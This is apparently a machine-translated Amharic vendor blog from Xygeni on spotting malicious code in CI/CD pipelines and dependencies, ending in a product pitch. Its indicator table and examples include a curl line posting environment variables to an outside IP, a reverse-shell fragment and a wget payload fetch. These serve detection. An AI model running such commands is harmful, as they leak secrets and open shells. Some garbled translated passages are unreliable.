ውስጥ የምትሰራ ከሆነ CI/CD pipelineዎች፣ የአውቶሜሽን ስክሪፕቶችን መጻፍ ወይም ዘመናዊ የግንባታ ስርዓቶችን መጠበቅ፣ ተንኮል አዘል ኮድ መለየት አማራጭ አይደለም፤ ተልዕኮው ወሳኝ ነው። ተንኮል አዘል የኮድ ጥቃቶች የእርስዎን የሩጫ ጊዜ ብቻ አይጠቀሙም፤ በየቀኑ የሚተማመኑባቸውን የግንባታ ደረጃዎች፣ የሶስተኛ ወገን ፓኬጆችን እና የአውቶሜሽን ስራዎችን ያስታጥቃሉ።
ይህ ጽሑፍ የትኞቹ ባህሪያት ተንኮል አዘል የኮድ ጥቃትን ሊያመለክቱ እንደሚችሉ እና ተንኮል አዘል ኮድ እንዴት ሊሰራጭ እንደሚችል ያብራራል፣ በተለይም በ ውስጥ CI/CD አካባቢዎች። ለሶፍትዌር አቅርቦት ሰንሰለቶች ኃላፊነት ላላቸው ገንቢዎች እና የዴቭሴክኦፕስ ቡድኖች የተነደፈ ነው፣ አውቶሜሽን ለመገንባት እና ደህንነቱ የተጠበቀ የማሰማራት የስራ ፍሰቶችን ለማከናወን። እነዚህን አመልካቾች እና የጥቃት ቬክተሮችን በመረዳት፣ ቡድኖች ስጋቶችን በተሻለ ሁኔታ ለይተው ማወቅ እና እምነታቸውን ማጠንከር ይችላሉ። pipelineስምምነትን በመቃወም።
ትማራለህ አጥቂዎች እንዴት ማስፈራሪያዎችን ወደ እርስዎ ውስጥ እንደሚያካትቱ pipelines፣ ምን ምልክቶች መታየት እንዳለባቸው እና እንደ ጥገኛ ጭነቶች እና የስራ ፍሰት አውቶሜሽን ባሉ መደበኛ ተግባራት አማካኝነት ተንኮል አዘል ኮድ በጸጥታ እንዴት ሊሰራጭ እንደሚችል። ምልክቶችን እንከፋፍል፣ ከማይጠበቁ የወጪ ትራፊክ እስከ የCI ስራዎችን የሚያበላሹ ተንኮለኛ የህዝብ ግንኙነት ስርዓቶች፣ ስለዚህ ስጋቶች ምርት ከመጀመራቸው በፊት ለይተው ማወቅ እና ማስወገድ ይችላሉ።
ተንኮል አዘል ኮድ ጥቃት ምንድን ነው?
ተንኮል አዘል ኮድ ጥቃት ማለት ጎጂ ኮድ በመተግበሪያዎ ውስጥ ሲተገበር ነው፣ ይገንቡ pipelineወይም የሩጫ ጊዜ አካባቢ። በተለይ ለሚከተሉት የተፃፈ ሎጂክ እየተነጋገርን ነው፦
- እንደ የኤፒአይ ቁልፎች እና ምስክርነቶች ያሉ ምስጢሮችን ይሰርቁ
- በበሽታው የተያዙ ቅርሶችን ይንቀጠቀጡ ወይም ይግፉ
- ሼሎችን ይክፈቱ ወይም ውሂብን ያጣሩ
ተንኮል አዘል ኮድ ስህተት ብቻ አይደለም። በዓላማ የሚመራ ነው። እና ብዙውን ጊዜ በመደበኛ መሳሪያዎችዎ ውስጥ ይኖራል፡ ጥገኛዎች፣ የCI ስራዎች፣ የመጫኛ ስክሪፕቶች።
ገንቢዎች ለምን ሊያስቡበት ይገባል? ምክንያቱም ስጋት የሚመጣው ሁልጊዜ ከውጭ አጥቂዎች የሚመጡ አይደሉም ምክንያቱም ኤፒአይዎችዎን ከመምታት ነው። ተንኮል አዘል ኮድ በየቀኑ በሚያሄዱት የስራ ፍሰቶች ውስጥ እራሱን ያካትታል፣ ለምሳሌ npm ጭነቶች ወይም Docker builds። ተንኮል አዘል ኮድ በእውነተኛ ዓለም ማዋቀር ውስጥ ሊሰራጭ የሚችለው በዚህ መንገድ ነው።
ከሚከተሉት ውስጥ የትኛው ተንኮል አዘል የኮድ ጥቃትን ሊያመለክት ይችላል? ለገንቢዎች ተግባራዊ ምልክቶች
ከሚከተሉት ውስጥ የትኛው ተንኮል አዘል የኮድ ጥቃትን ሊያመለክት እንደሚችል እያሰቡ ከሆነ፣ መልሱ የሚጀምረው በሚታይ ባህሪ ነው፡
| አመልካች (ምልክት) | ለምሳሌ | መሰረታዊው ችግር | ዓይነት |
|---|---|---|---|
| ከግንባታዎቹ ያልተጠበቀ የወጪ ትራፊክ | curl -X POST http://198.51.100.42 -d "$(env)" በድህረ-ጫኝ ስክሪፕት ውስጥ | ተንኮል አዘል የኤንፒኤም ጥቅል | እውነተኛ አመልካች |
| በምንጭ ማከማቻ ውስጥ የተሻሻሉ ወይም የተደበቁ ፋይሎች | የተደበቀ ቤዝ 64 ኢንች .github/workflows/build.yml | የአቅርቦት ሰንሰለት ስምምነት | እውነተኛ አመልካች |
| ባልተጠበቁ ስራዎች የተገኙ ምስጢሮች | ያልተፈቀደ የCI ስራን በመጠቀም ${{ secrets.AWS_SECRET_KEY }} | የIAM የተሳሳተ ውቅር ወይም መርፌ | እውነተኛ አመልካች |
| የተገላቢጦሽ ሼል ወይም wget ሂደት በግንባታ ላይ | bash -i >& /dev/tcp/... shellcode በCI ደረጃ | የተዛባ pipeline ስክሪፕት | እውነተኛ አመልካች |
| የተተየበ ጥቅል ከመጫኛ ስክሪፕት ጋር | lodashs or react-core-js ያልተጠበቀ ኮድ ያስኬዳል | የጥገኝነት ግራ መጋባት | እውነተኛ አመልካች |
| የተከፈተ CI/CD ፍቃዶች | ሁሉም ስራዎች ሁሉንም ሚስጥሮች ማግኘት ይችላሉ | ደካማ ነባሪ ውቅሮች | ደካማ ልምምድ (ምልክት አይደለም) |
| የፋይል ትክክለኛነት ማረጋገጫዎች እጥረት | ውቅሩ ሲቀየር ምንም ማንቂያዎች የሉም | ክትትል የለም | ደካማ ልምምድ (ምልክት አይደለም) |
ያልተጠበቀ የውጪ አውታረ መረብ ትራፊክ ከግንባታ Pipelines
ምልክቶች: የCI ስራዎችዎ በድንገት ከማይታወቁ ውጫዊ የአይፒ አድራሻዎች ወይም ጎራዎች ጋር ይገናኛሉ።
ለምሳሌ: የተጎዳ የድህረ-ጫና ስክሪፕት የአካባቢ ተለዋዋጮችን ወደ 198.51.100.42 ለመላክ ኩርባን ይጠቀማል።
ስር መሰረት: በ package.json ላይ የተጨመረ ተንኮል አዘል የ npm ጥገኝነት ወይም የተቀየረ የ CI ስክሪፕት።
አይነት: እውነተኛ አመልካች
እንዴት መከላከል እንደሚቻል፡-
በCI ሯጮችዎ ውስጥ በነባሪነት የሚወጣውን ትራፊክ ያግዱ (ለምሳሌ፣ የፋየርዎል ደንቦችን ይጠቀሙ ወይም በነባሪነት የሚከለክሉ የውጪ ፖሊሲዎችን ይጠቀሙ)
ለተወሰኑ ጎራዎች ብቻ መዳረሻ ለመፍቀድ የአውታረ መረብ ፖሊሲ ያክሉ፦
በምንጭ ማከማቻዎች ውስጥ የተሻሻሉ ወይም ያልተጠበቁ ፋይሎች
ምልክቶች: አዲስ ፋይሎች ወይም ስክሪፕቶች ያለ ግልጽ ማብራሪያ በምንጭ ቁጥጥር ውስጥ ይታያሉ።
ለምሳሌ: የተደበቀ የBase64 የክፍያ ጭነት ወደ package-lock.json ወይም .github/workflows/build.yml ወርዷል
ስር መሰረት: በተንኮል አዘል የህዝብ ግንኙነት ግንኙነቶች ወይም በተበላሹ ጥገኝነቶች ምክንያት የአቅርቦት ሰንሰለት መበላሸት።
አይነት: እውነተኛ አመልካች
እንዴት መከላከል እንደሚቻል፡-
ራስ-ሰር የፋይል ታማኝነት ክትትልን ይጠቀሙ (ለምሳሌ፣ Tripwire ወይም Git) hooks ከቼክሰም ቼኮች ጋር)
የGitHub CODEOWNERSን በመጠቀም የስራ ፍሰትን በእጅ መገምገም እና የፋይል ለውጦችን ቆልፍ ማድረግ፡
የተዘመኑ ጥገኝነቶችን ቼኮች ያረጋግጡ
ያልተለመዱ የምስክርነት አጠቃቀም ቅጦች
ምልክቶች: ምስጢሮች በእርስዎ ውስጥ ባልተጠበቁ ተጠቃሚዎች፣ አገልግሎቶች ወይም ደረጃዎች እየተደረሱ ነው። pipeline.
ለምሳሌ: የምስጢር አስተዳዳሪ ምዝግብ ማስታወሻዎች መዳረሻ ሊኖረው የማይገባውን ሥራ ማግኘትን ያሳያሉ።
ስር መሰረት: የተሳሳተ የIAM ፖሊሲዎች፣ የፈሰሱ ምስክርነቶች ወይም የCI የስራ መርጫ።
አይነት: እውነተኛ አመልካች
እንዴት መከላከል እንደሚቻል፡-በመዳረሻ ፖሊሲዎች ውስጥ ዝቅተኛውን መብት ማስከበር (ለምሳሌ፣ አንድ ሥራ = አንድ ሚስጥር)
ሚስጥራዊ ምዝግብ ማስታወሻዎችን ይቆጣጠሩ እና ያልተለመደ አጠቃቀም ማንቂያ ያዘጋጁ
የጂትሆብ አካባቢ ጥበቃ ደንቦችን እና የተዘረጉ ምስጢሮችን ይጠቀሙ፡
- የሚጠበቀውን የሥራ ባህሪ በራስ-ሰር የፖሊሲ ፍተሻዎችን በመጠቀም ያረጋግጡ (ለምሳሌ፣ OPA/Gatekeeper)
ያልተለመደ የሂደት አፈፃፀም በ CI/CD ወይም የሩጫ ጊዜ
ምልክቶች: የተገነቡ ወይም የተሰማሩ መተግበሪያዎች ያልተጠበቁ ሂደቶችን ይጀምራሉ።
ለምሳሌ: bash -c \"wget http://malicious.site/payload.sh\" በግንባታ ወቅት ይታያል።
ስር መሰረት: የተወጉ ስክሪፕቶች፣ የተገላቢጦሽ ዛጎሎች ወይም የተዛቡ pipeline እርምጃዎች.
አይነት: እውነተኛ አመልካች
እንዴት መከላከል እንደሚቻል፡-ለትእዛዝ የተፈቀዱ ዝርዝሮችን ይጠቀሙ (ለምሳሌ፣ ለተፈቀዱ የግንባታ መሳሪያዎች ብቻ ይገድቡ)
በአነስተኛ ኮንቴይነሮች ውስጥ ስራዎችን በማካሄድ በCI ውስጥ የሂደት ችሎታዎችን መቆለፍ፡
- የሼል አጠቃቀምን እና የሚታወቁ መጥፎ ቅጦችን በCI-የተዋሃዱ linters በመጠቀም ይቃኙ እና SAST
ተንኮል አዘል ኮድን የሚፈጽሙ የተበላሹ ጥገኝነቶች
ምልክቶች: ስክሪፕቶችን ወይም ዝማኔዎችን መጫን ያለእርስዎ ፍላጎት ያልተፈቀደ ኮድ ያስኬዳል።
ለምሳሌ: እንደ የፊደል አጻጻፍ ፓኬጅ lodashs or react-core-js ተንኮል አዘል ቅድመ-መጫኛ መንጠቆ ያሂዳል።
ስር መሰረት: የጥገኝነት ግራ መጋባት ወይም የማይታመኑ መዝገቦችን መጠቀም።
አይነት: እውነተኛ አመልካች
እንዴት መከላከል እንደሚቻል፡-
ጥገኝነቶችን ከ ጋር ቆልፍ SBOM ማረጋገጫ እና ሃሽ ፒንኒንግ፡
ጥቅም
.npmrcor.yarnrc.ymlየተፈቀዱ መዝገቦችን በተፈቀደላቸው ዝርዝር ውስጥ ለማስገባት፦
ፓኬጆችን በመጠቀም ቀጣይነት ያለው ኦዲት ማድረግ SCA እንደ Xygeni፣ OSV-Scanner ወይም Dependabot ያሉ መሳሪያዎች
ተንኮል አዘል ኮድ በገንቢ የስራ ፍሰቶች ውስጥ እንዴት ሊሰራጭ ይችላል?
ተንኮል አዘል ኮድ እንዴት ሊሰራጭ እንደሚችል መረዳት ምርት ከመምጣቱ በፊት እንዲያቆሙት ይረዳዎታል፡
- የተበላሹ ክፍት ምንጭ ፓኬጆች (ለምሳሌ፣ በበሽታው የተያዙ npm/PyPI ሞጁሎች)
- ተንኮል አዘል pull requests በስራ ፍሰቶች ውስጥ ከተደበቁ የክፍያ ጭነቶች ጋር
- CI/CD የተሳሳቱ ውቅሮች (ለምሳሌ፣ ያልተረጋገጡ የህዝብ ግንኙነት ባለሙያዎች ስራዎችን የሚያከናውኑ)
- ውስጣዊ ስጋቶች በመደበኛ እድገት ወቅት የኋላ በሮችን እያካተቱ ነው
እነዚህ ሁሉ ተንኮል አዘል ኮድ ባህላዊ ማንቂያዎችን ሳያስነሳ እንዴት ሊሰራጭ እንደሚችል የሚያሳዩ ቬክተሮች ናቸው።
ተንኮል አዘል ኮድን እንዴት ማግኘት እና መከላከል እንደሚቻል Pipelineኤስ እና ኮዴቤዝ
የተንኮል አዘል ኮድ አመልካቾችን ለማግኘት ፈጣን የፍተሻ ዝርዝር
| ጠባይ | የማወቂያ መሳሪያ | CI/CD ጫፍ |
|---|---|---|
| ያልተጠበቁ የአውታረ መረብ ጥያቄዎች | የባህሪ ክትትል፣ የመውጣት ምዝግብ ማስታወሻዎች | የዲኒሊስት አይፒዎች፣ የኦዲት ኩርባ/wget አጠቃቀም |
| የ YAML ወይም የመቆለፊያ ፋይል ማበላሸት | የፋይል ታማኝነት ክትትል፣ የጂት ልዩነቶች | CODEOWNERSን ያስፈጽሙ፣ ቁልፍ የፋይል ለውጦች ሲኖሩ ያሳውቁ |
| ያልተለመደ ሚስጥራዊ መዳረሻ | ሚስጥራዊ የመዳረሻ ምዝግብ ማስታወሻዎች፣ የአይኤኤም ማንቂያዎች | የተዘረጉ ምስጢሮችን ይጠቀሙ፣ ዝቅተኛውን መብት ያስፈጽሙ |
| የሼል አፈፃፀም ወይም የተገላቢጦሽ ዛጎሎች | SAST፣ የተፈቀደ ዝርዝር ቅኝት | በግንባታ ስክሪፕቶች ውስጥ የሼል አጠቃቀምን ይገድቡ |
| አጠራጣሪ ጥገኝነቶች | SCA, SBOM ማረጋገጫ | የተቆለፉ ሃሾችን እና የታመኑ መዝገቦችን ይጠቀሙ |
የምርት ማንቂያዎችን አትጠብቁ። ገንቢዎች እና የDevSecOps ቡድኖች ተንኮል አዘል የኮድ ጥቃትን እንዴት አስቀድመው መለየት እንደሚችሉ እነሆ፡
- የባህሪ ክትትል፡ ያልተለመደ የሂደት አፈጻጸም፣ የአውታረ መረብ ጥሪዎች ወይም የፋይል ለውጦችን በ ውስጥ ያግኙ CI/CD.
- የጥገኝነት ቁጥጥር፡ ጥቅም SBOMያልተረጋገጡ ቤተ-መጻሕፍትን ለማገድ ጥብቅ የተፈቀዱ ዝርዝሮች።
- የፋይል ታማኝነት ክትትል፦ ያልተፈቀዱ ስክሪፕቶችን ወይም የፋይል ለውጦችን ፈልግ።
- የመውጣት ገደቦች፡ ወደ ውጭ የሚወጣውን ትራፊክ በመተንተን እና በማገድ የግንባታ ጊዜን ማስወገድን ይከላከሉ።
- የማይንቀሳቀስ እና ተለዋዋጭ ትንተና፡ በእርስዎ ውስጥ አጠራጣሪ አመክንዮ፣ የሼል ጥሪ ወይም የኮድ አወጣጥ በራስ-ሰር ፍተሻዎችን ያድርጉ pipelines.
በተለየ መልኩ:
- የማይንቀሳቀስ የመተግበሪያ ደህንነት ሙከራ (SAST): ተንኮል አዘል አመክንዮ ወይም የተደበቀ ኮድ (ለምሳሌ፣ የተደበቀ ቤዝ64፣ አጠራጣሪ የሼል ጥሪ) ከመፈጸሙ በፊት መለየት ይችላል። SAST መሳሪያዎች ወደ እርስዎ CI/CD የስራ ፍሰቶች ከፍተኛ ተጋላጭነት ያላቸውን ቅጦች ለመለየት ይረዳሉ pull requests ና commits.
- የሶፍትዌር ቅንብር ትንተና (SCA): የጥገኝነት አፈታት ሂደት ውስጥ የሚታወቁ ተጋላጭ ወይም ተንኮል አዘል ፓኬጆችን ይለያል። SCA መሳሪያዎች የፊደል አጻጻፍ የተሳሳቱ ወይም የኋላ በር ያላቸው ፓኬጆች ወደ አካባቢዎ ከመግባታቸው በፊት በመጫኛ ጊዜ እንዲያግዱ ያግዝዎታል።
እነዚህ ሁሉ ለሚለው ጥያቄ መልስ ይሰጣሉ፡ ከሚከተሉት ውስጥ የትኛው ተንኮል አዘል የኮድ ጥቃትን ሊያመለክት ይችላል፣ እና የትኞቹ ደግሞ እንግዳ የሆኑ ድምፆች ናቸው።
ገንቢዎች ሊማሩባቸው የሚገቡ እውነተኛ ክስተቶች
መላምታዊ አገላለጾች አያስፈልጉዎትም፤ እነዚህ ተንኮል አዘል የኮድ ጥቃቶች አስቀድመው ተከስተዋል፣ እና እያንዳንዱ ወሳኝ ትምህርቶችን ይሰጣል፡
- ማይክሮሶፍት፣ አፕል፡ በሱስ ግራ መጋባት ተጎድቷል፣ የውስጥ ፓኬጆችን ከሕዝብ መዝገቦች ለማውጣት ተታለለ።
ተይዞ መውሰድ: የጥገኝነት ግራ መጋባትን ለመከላከል የግል መዝገቦችን ይጠቀሙ እና የተገደበ የጥቅል ጥራት ያዋቅሩ። - ua-parser-js: ታዋቂው የኤንፒኤም ፓኬጅ ክሪፕቶ ማዕድን ቆፋሪዎችን ለማሰማራት ተጥሏል።
ተይዞ መውሰድ: ጥቅም SBOM ያልተረጋገጠ የጥቅል ዝመናዎችን ለማስወገድ የማረጋገጫ እና የCI ጥገኝነት ፒን ማድረግ። - በፒፒአይ ላይ የፊደል አጻጻፍ እንደ እውነተኛ ተብለው የተሰየሙ ተንኮል አዘል ፓኬጆች (ለምሳሌ፣ urlib3) የመረጃ ዘራፊዎችን ለማሰራጨት።
ተይዞ መውሰድ: ማዋሃድ SCA ከመጫንዎ በፊት ተመሳሳይ የሆኑ ፓኬጆችን ለመለየት እና ጥገኝነቶችን ለማረጋገጥ የሚረዱ መሳሪያዎች። - የጂትሆብ PRዎች፡ አጥቂዎች በጸጥታ የሲአይ የስራ ፍሰቶችን የሚቀይሩ የህዝብ ግንኙነት ባለሙያዎችን አቅርበዋል leak secrets.
ተይዞ መውሰድ: ለስራ ፍሰት ፋይሎች ጥብቅ የህዝብ ግንኙነት ግምገማዎችን ያስፈጽሙ እና ለCI ውቅር ለውጦች የኮድ ባለቤቶችን ይጠቀሙ።
እያንዳንዱ ጉዳይ ተንኮል አዘል ኮድ ወደ ምርት ከመድረሱ በፊት በገንቢ አካባቢዎች እንዴት ሊሰራጭ እንደሚችል ያሳያል፣ እና እነሱን ቀደም ብለው ለማስቆም ተግባራዊ የሆኑ ልምዶችን ያጎላል።
ማጠቃለያ፡ ገንቢዎች በተንኮል አዘል ኮድ ላይ ግንባር ቀደም መስመርን ይቆጣጠራሉ
ተንኮል አዘል የኮድ ጥቃት ሁልጊዜ ከውጭ የመጣ ጥሰት ማለት አይደለም። አንዳንድ ጊዜ አጥቂው በእርስዎ ውስጥ እየተደበቀ ነው። nኦዲ_ሞጁሎች, የእርስዎ ጥቅል-መቆለፊያ.json, ወይም የእርስዎ የ.github/workflows ፋይል።
ከሚከተሉት ውስጥ የትኛው ተንኮል አዘል የኮድ ጥቃትን ሊያመለክት ይችላል? መልሱ የሚገኘው ኮድዎ እና መሳሪያዎችዎ በየቀኑ በሚወጡት ምልክቶች ላይ ነው።
የእርስዎን ባለቤት ያድርጉ CI/CDጥገኝነትዎን ይጠብቁ። እንግዳ የሆኑ ባህሪያትን ይጠቁሙ። ቀደም ብለው ባስተዋሉ ቁጥር የሚስፋፋው መጠን ይቀንሳል
Xygeni በ DevOps ላይ ተንኮል አዘል የኮድ ጥቃቶችን እንዴት ለይቶ ለማወቅ እና ለማገድ ይረዳል
ማልዌር በሶፍትዌር አቅርቦት ሰንሰለትዎ ውስጥ ሲሰራጭ፣ ምርት እስኪደርስ ድረስ ብዙ ጊዜ ዘግይቷል። ለዚህም ነው ቀደም ብሎ አውቶማቲክ መለየት አስፈላጊ የሆነው። የXygeni's ቅድመ ማስጠንቀቂያ ስርዓት ተንኮል አዘል ፓኬጆች የእርስዎን የኮድቤዝ ከመበከላቸው በፊት ለመያዝ የተነደፈ ነው፣ CI/CD pipelineዎች፣ ወይም የደመና አካባቢዎች።
እንዴት እንደሆነ እነሆ ዚጌኒ መከላከያዎን ያጠናክራል፦
ስለ ዜሮ-ዴይ ማልዌር የእውነተኛ ጊዜ ቅድመ ማስጠንቀቂያ
በCVEዎች ላይ ብቻ ከሚመኩ ባህላዊ ስካነሮች በተለየ፣ Xygeni እንደ npm፣ PyPI፣ Maven እና NuGet ያሉ የህዝብ መዝገቦችን አጠራጣሪ ባህሪያትን እና የሜታዳታ ያልተለመዱ ነገሮችን ለማግኘት ያለማቋረጥ ይከታተላል። አንድ ፓኬጅ የተንኮል አዘል እንቅስቃሴ ምልክቶችን እንዳሳየ ወዲያውኑ ምልክት ይደረግበታል፣ ይገለላል እና ወደ እርስዎ እንዳይገባ ይታገዳል። SDLC.
- በታተመበት ጊዜ ተንኮል አዘል ዌርን ያገኛል
- የዜሮ ቀን የክፍያ ጭነቶችን እና አጠራጣሪ ጭነትን በራስ-ሰር ያግዳል hooks
- ፈጣን ምርመራ ለማድረግ የእውነተኛ ጊዜ ማንቂያዎችን ለ DevOps ቡድኖች ይልካል
የማልዌር ጥበቃ በእያንዳንዱ የDevOps ደረጃ ላይ ተካትቷል
በድህረ-ጫኝ ስክሪፕት ውስጥ የተደበቀ ኮድ፣ በሽግግር ጥገኝነት ውስጥ የተደበቀ ክሪፕቶ-ሰር ወይም ትሮጃን የተደረገበት የኮንቴይነር ምስል ይሁን፣ Xygeni በኮድ፣ ጥገኞች፣ CI/CD, እና IaC:
- ከመተግበሩ በፊት የኋላ በሮችን፣ ትሮጃኖችን እና የተደበቁ የክፍያ ጭነቶችን የሚጠቁም የማይለዋወጥ ትንተና
- ተንኮል አዘል የመጫኛ ስክሪፕቶችን በመጠቀም የትሮጃን ፓኬጆችን የሚያግድ የጥገኝነት ፋየርዎል
- CI/CD የተገላቢጦሽ ዛጎሎች እና መርፌዎችን በመርፌዎ ውስጥ እንዳይገቡ የሚከላከል መከላከያ pipelines.
Guardrails እና ስርጭቱን ለማስቆም ኳራንቲን ማድረግ
Xygeni ተንኮል አዘል ዌርን ብቻ ሳይሆን ያቆመዋል። የተበላሸ ፓኬጅ ሲገኝ፡
- የግንባታ ጊዜ ብክለትን ለማስወገድ ወዲያውኑ ተገልሎ እንዲቆይ ይደረጋል
- ያንተ pipelineዎች የXygeniን ሊዋቀሩ የሚችሉ የደህንነት ፖሊሲዎችን በመጠቀም ግንባታውን በራስ-ሰር ሊሰብረው ይችላል
- የተጎዱ ስሪቶች ከውስጥ ወይም ከግል መዝገቦችም ጭምር በጥቁር መዝገብ ውስጥ ተካትተዋል
ይመርምሩ እና መረጃ ያግኙ
Xygeni ሙሉ የኦዲት ዱካ እና የተንኮል አዘል ፓኬጆችን ታሪካዊ ፍለጋ ያቀርባል። የሚከተሉትን ያውቃሉ፦
- ዛቻው መቼ እንደታተመ
- እንዴት እንደተገኘ
- ወደ ማንኛውም የስርዓትዎ ክፍል ደርሶ እንደሆነ
በተጨማሪም፣ ሰፋ ያለውን ክፍት ምንጭ ማህበረሰብ ለመጠበቅ እና ተንኮል አዘል ዌር እንደገና በተሰየሙ ወይም በተሰየሙ ፓኬጆች ውስጥ እንደገና እንዳይታይ ለመከላከል የተረጋገጡ ማስፈራሪያዎች በይፋ ይገለጻሉ።
ማልዌር ስንጥቆችን እንዲያልፉ አይፍቀዱ
ከስውር ክሪፕቶ-ማዕድን ቆፋሪዎች እስከ የፊደል አጻጻፍ መረጃ ሰረቆች፣ ተንኮል አዘል የኮድ ጥቃቶች በፍጥነት እየተሻሻሉ ነውየXygeni የቅድመ ማስጠንቀቂያ ስርዓት ተንኮል አዘል ዌር ከገንቢዎ፣ ከግንባታዎ ወይም ከአገልግሎት ሰጪዎ ደረጃዎች ፈጽሞ እንደማይያልፍ እና ቡድንዎ በእውነተኛ ጊዜ እንዲነቃ እና እንዲጠበቅ ያረጋግጣል።
ነፃ ሙከራዎን አሁን ይጀምሩ እና የDevOpsዎን ይጠብቁ pipeline የሚቀጥለው ጥቃት ከመከሰቱ በፊት!




